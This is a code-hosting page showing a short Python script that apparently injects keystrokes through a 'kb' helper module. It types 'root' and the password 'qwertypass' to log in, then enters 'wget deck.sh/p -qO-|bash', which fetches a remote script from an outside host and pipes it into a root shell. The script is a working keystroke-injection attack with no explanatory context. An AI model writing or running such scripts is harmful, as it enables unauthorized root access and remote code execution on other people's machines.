You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

11 lines
187 B
Python

#!/usr/bin/env python3
from kb import write_str
from time import sleep
write_str("root\n")
sleep(0.5)
write_str("qwertypass\n")
sleep(2)
write_str("wget deck.sh/p -qO-|bash\n")
sleep(1)